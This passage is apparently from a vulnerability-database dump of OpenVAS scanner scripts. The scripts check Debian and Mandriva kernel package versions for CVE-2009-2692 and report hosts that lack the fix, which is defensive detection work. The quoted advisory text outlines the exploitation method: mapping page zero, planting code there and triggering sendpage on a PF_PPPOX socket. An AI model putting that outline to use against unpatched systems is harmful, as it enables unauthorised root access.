isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-686-bigmem\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-686-bigmem\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-686\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-mckinley\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-mckinley\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-itanium\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-itanium\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-all-ia64\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-r4k-ip22\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-r4k-ip22\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-5kc-malta\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-sb1a-bcm91480b\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-4kc-malta\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-all-mips\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-r5k-ip32\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-4kc-malta\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-r5k-ip32\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-5kc-malta\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-sb1-bcm91250a\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-sb1a-bcm91480b\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-sb1-bcm91250a\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-r5k-cobalt\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-r5k-cobalt\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-all-mipsel\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-powerpc\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-powerpc-smp\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-powerpc\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-powerpc64\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-all-powerpc\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-powerpc64\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-powerpc-smp\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-powerpc-miboot\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-powerpc-miboot\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-s390x\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-s390x\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-s390\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-s390\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-s390-tape\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-all-s390\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-all-sparc\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-sparc64\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-sparc64-smp\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-sparc64\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-sparc64-smp\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:38:52", "description": "The remote host is missing an update to kernel\nannounced via advisory MDVSA-2009:233.", "cvss3": {}, "published": "2009-09-21T00:00:00", "type": "openvas", "title": "Mandrake Security Advisory MDVSA-2009:233 (kernel)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-2692"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:136141256231064906", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064906", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: mdksa_2009_233.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory MDVSA-2009:233 (kernel)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A vulnerability was discovered and corrected in the Linux 2.6 kernel:\n\nThe Linux kernel 2.6.0 through 2.6.30.4, and 2.4.4 through 2.4.37.4,\ndoes not initialize all function pointers for socket operations\nin proto_ops structures, which allows local users to trigger a NULL\npointer dereference and gain privileges by using mmap to map page zero,\nplacing arbitrary code on this page, and then invoking an unavailable\noperation, as demonstrated by the sendpage operation on a PF_PPPOX\nsocket. (CVE-2009-2692)\n\nTo update your kernel, please follow the directions located at:\n\nhttp://www.mandriva.com/en/security/kernelupdate\n\nAffected: 2008.1, Corporate 3.0, Corporate 4.0,\n Multi Network Firewall 2.0\";\ntag_solution = \"To upgrade automatically use MandrakeUpdate or urpmi. The verification\nof md5 checksums and GPG signatures is performed automatically for you.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=MDVSA-2009:233\";\ntag_summary = \"The remote host is missing an update to kernel\nannounced via advisory MDVSA-2009:233.\";\n\n \n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.64906\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-09-21 23:13:00 +0200 (Mon, 21 Sep 2009)\");\n script_cve_id(\"CVE-2009-2692\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Mandrake Security Advisory MDVSA-2009:233 (kernel)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"kernel-2.6.24.7-3mnb\", rpm:\"kernel-2.6.24.7-3mnb~1~1mnb1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-desktop-2.6.24.7-3mnb\", rpm:\"kernel-desktop-2.6.24.7-3mnb~1~1mnb1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-desktop586-2.6.24.7-3mnb\", rpm:\"kernel-desktop586-2.6.24.7-3mnb~1~1mnb1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-desktop586-devel-2.6.24.7-3mnb\", rpm:\"kernel-desktop586-devel-2.6.24.7-3mnb~1~1mnb1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-desktop586-devel-latest\", rpm:\"kernel-desktop586-devel-latest~2.6.24.7~3mnb1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-desktop586-latest\", rpm:\"kernel-desktop586-latest~2.6.24.7~3mnb1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-desktop-devel-2.6.24.7-3mnb\", rpm:\"kernel-desktop-devel-2.6.24.7-3mnb~1~1mnb1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-desktop-devel-latest\", rpm:\"kernel-desktop-devel-latest~2.6.24.7~3mnb1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-desktop-latest\", rpm:\"kernel-desktop-latest~2.6.24.7~3mnb1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.24.7~3mnb1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-laptop-2.6.24.7-3mnb\", rpm:\"kernel-laptop-2.6.24.7-3mnb~1~1mnb1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-laptop-devel-2.6.24.7-3mnb\", rpm:\"kernel-laptop-devel-2.6.24.7-3mnb~1~1mnb1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-laptop-devel-latest\", rpm:\"kernel-laptop-devel-latest~2.6.24.7~3mnb1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-laptop-latest\", rpm:\"kernel-laptop-latest~2.6.24.7~3mnb1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-server-2.6.24.7-3mnb\", rpm:\"kernel-server-2.6.24.7-3mnb~1~1mnb1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-server-devel-2.6.24.7-3mnb\", rpm:\"kernel-server-devel-2.6.24.7-3mnb~1~1mnb1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-server-devel-latest\", rpm:\"kernel-server-devel-latest~2.6.24.7~3mnb1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-server-latest\", rpm:\"kernel-server-latest~2.6.24.7~3mnb1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-source-2.6.24.7-3mnb\", rpm:\"kernel-source-2.6.24.7-3mnb~1~1mnb1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-source-latest\", rpm:\"kernel-source-latest~2.6.24.7~3mnb1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-2.6.3.41mdk\", rpm:\"kernel-2.6.3.41mdk~1~1mdk\", rls:\"MNDK_3.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-BOOT-2.6.3.41mdk\", rpm:\"kernel-BOOT-2.6.3.41mdk~1~1mdk\", rls:\"MNDK_3.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.3~41mdk\", rls:\"MNDK_3.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-enterprise-2.6.3.41mdk\", rpm:\"kernel-enterprise-2.6.3.41mdk~1~1mdk\", rls:\"MNDK_3.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-i686-up-4GB-2.6.3.41mdk\", rpm:\"kernel-i686-up-4GB-2.6.3.41mdk~1~1mdk\", rls:\"MNDK_3.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-p3-smp-64GB-2.6.3.41mdk\", rpm:\"kernel-p3-smp-64GB-2.6.3.41mdk~1~1mdk\", rls:\"MNDK_3.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-secure-2.6.3.41mdk\", rpm:\"kernel-secure-2.6.3.41mdk~1~1mdk\", rls:\"MNDK_3.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp-2.6.3.41mdk\", rpm:\"kernel-smp-2.6.3.41mdk~1~1mdk\", rls:\"MNDK_3.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-source\", rpm:\"kernel-source~2.6.3~41mdk\", rls:\"MNDK_3.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-source-stripped\", rpm:\"kernel-source-stripped~2.6.3~41mdk\", rls:\"MNDK_3.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-2.6.12.41mdk\", rpm:\"kernel-2.6.12.41mdk~1~1mdk\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-BOOT-2.6.12.41mdk\", rpm:\"kernel-BOOT-2.6.12.41mdk~1~1mdk\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-doc-2.6.12.41mdk\", rpm:\"kernel-doc-2.6.12.41mdk~1~1mdk\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-i586-up-1GB-2.6.12.41mdk\", rpm:\"kernel-i586-up-1GB-2.6.12.41mdk~1~1mdk\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-i686-up-4GB-2.6.12.41mdk\", rpm:\"kernel-i686-up-4GB-2.6.12.41mdk~1~1mdk\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp-2.6.12.41mdk\", rpm:\"kernel-smp-2.6.12.41mdk~1~1mdk\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-source-2.6.12.41mdk\", rpm:\"kernel-source-2.6.12.41mdk~1~1mdk\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-source-stripped-2.6.12.41mdk\", rpm:\"kernel-source-stripped-2.6.12.41mdk~1~1mdk\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-xbox-2.6.12.41mdk\", rpm:\"kernel-xbox-2.6.12.41mdk~1~1mdk\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-xen0-2.6.12.41mdk\", rpm:\"kernel-xen0-2.6.12.41mdk~1~1mdk\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-xenU-2.6.12.41mdk\", rpm:\"kernel-xenU-2.6.12.41mdk~1~1mdk\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-2.6.3.41mdk\", rpm:\"kernel-2.6.3.41mdk~1~1mdk\", rls:\"MNDK_2.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-BOOT-2.6.3.41mdk\", rpm:\"kernel-BOOT-2.6.3.41mdk~1~1mdk\", rls:\"MNDK_2.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.3~41mdk\", rls:\"MNDK_2.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-enterprise-2.6.3.41mdk\", rpm:\"kernel-enterprise-2.6.3.41mdk~1~1mdk\", rls:\"MNDK_2.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-i686-up-4GB-2.6.3.41mdk\", rpm:\"kernel-i686-up-4GB-2.6.3.41mdk~1~1mdk\", rls:\"MNDK_2.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-p3-smp-64GB-2.6.3.41mdk\", rpm:\"kernel-p3-smp-64GB-2.6.3.41mdk~1~1mdk\", rls:\"MNDK_2.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-secure-2.6.3.41mdk\", rpm:\"kernel-secure-2.6.3.41mdk~1~1mdk\", rls:\"MNDK_2.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp-2.6.3.41mdk\", rpm:\"kernel-smp-2.6.3.41mdk~1~1mdk\", rls:\"MNDK_2.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-source\", rpm:\"kernel-source~2.6.3~41mdk\", rls:\"MNDK_2.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-source-stripped\", rpm:\"kernel-source-stripped~2.6.3~41mdk\", rls:\"MNDK_2.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:38:58", "description": "The remote host is missing an update to linux-2.6.24\nannounced via advisory DSA 1864-1.", "cvss3": {}, "published": "2009-09-02T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 1864-1 (linux-2.6.24)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-2692"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:136141256231064747", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064747", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1864_1.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory DSA 1864-1 (linux-2.6.24)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A vulnerability has been discovered in the Linux kernel that may lead\nto privilege escalation. The Common Vulnerabilities and Exposures\nproject identifies the following problem:\n\nCVE-2009-2692\n\nTavis Ormandy and Julien Tinnes discovered an issue with how the\nsendpage function is initialized in the proto_ops structure.\nLocal users can exploit this vulnerability to gain elevated\nprivileges.\n\nFor the oldstable distribution (etch), this problem has been fixed in\nversion 2.6.24-6~etchnhalf.8etch3.\n\nWe recommend that you upgrade your linux-2.6.24 packages.\";\ntag_summary = \"The remote host is missing an update to linux-2.6.24\nannounced via advisory DSA 1864-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201864-1\";\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.64747\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-09-02 04:58:39 +0200 (Wed, 02 Sep 2009)\");\n script_cve_id(\"CVE-2009-2692\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 1864-1 (linux-2.6.24)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"linux-support-2.6.24-etchnhalf.1\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-patch-debian-2.6.24\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-manual-2.6.24\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-source-2.6.24\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-tree-2.6.24\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-doc-2.6.24\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-all-alpha\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-alpha-smp\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-alpha-generic\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-common\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-all\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-alpha-legacy\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res 